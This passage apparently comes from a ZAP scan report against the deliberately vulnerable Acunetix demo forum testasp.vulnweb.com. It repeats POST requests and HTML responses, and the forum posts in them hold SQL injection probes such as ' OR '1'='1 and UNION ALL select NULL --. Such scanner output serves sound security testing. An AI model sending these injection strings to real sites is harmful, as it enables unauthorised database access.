help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3084 |
| Response Body - size: 3,084 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> 